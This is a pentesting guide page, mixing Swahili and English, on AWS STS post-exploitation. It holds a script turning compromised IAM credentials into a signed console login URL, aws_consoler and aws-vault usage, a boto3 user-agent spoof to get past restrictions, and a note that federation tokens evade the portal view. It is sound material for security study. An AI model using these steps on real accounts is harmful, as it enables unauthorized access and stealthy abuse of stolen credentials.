AWS - STS Post Exploitation

Reading time: 5 minutes

STS

Kwa taarifa zaidi:

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

Ikiwa umefanikiwa kupata baadhi ya IAM credentials, unaweza kuwa na nia ya accessing the web console kwa kutumia zana zifuatazo.\ Kumbuka kwamba user/role lazima iwe na ruhusa sts:GetFederationToken.

Skiripti maalum

Skiripti ifuatayo itatumia default profile na default AWS location (not gov and not cn) kukupa signed URL ambayo unaweza kutumia kuingia kwenye web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Unaweza kutengeneza kiungo cha console ya wavuti kwa kutumia https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

aws-vault

aws-vault ni zana ya kuhifadhi kwa usalama na kupata AWS credentials katika mazingira ya maendeleo.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Bypass User-Agent restrictions from Python

Ikiwa kuna restriction to perform certain actions based on the user agent inayotumika (kama kufungia matumizi ya python boto3 library kulingana na user agent) inawezekana kutumia mbinu iliyotajwa hapo juu ili connect to the web console via a browser, au unaweza moja kwa moja modify the boto3 user-agent kwa kufanya:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

sts:GetFederationToken

Kwa ruhusa hii inawezekana kuunda federated identity kwa mtumiaji anayeitekeleza, iliyozuiliwa kwa ruhusa ambazo mtumiaji huyu anazo.

aws sts get-federation-token --name <username>

Token iliyorejeshwa na sts:GetFederationToken inamhusu federated identity ya mtumiaji aliyeitisha, lakini ina ruhusa zilizopunguzwa. Hata kama mtumiaji ana administrator rights, vitendo vingine kama listing IAM users au attaching policies haviwezi kufanywa kupitia federated token.

Zaidi ya hayo, njia hii ni kwa kiasi fulani ya usiri zaidi, kwa kuwa federated user haionekani kwenye AWS Portal; inaweza kuonekana tu kupitia CloudTrail logs au monitoring tools.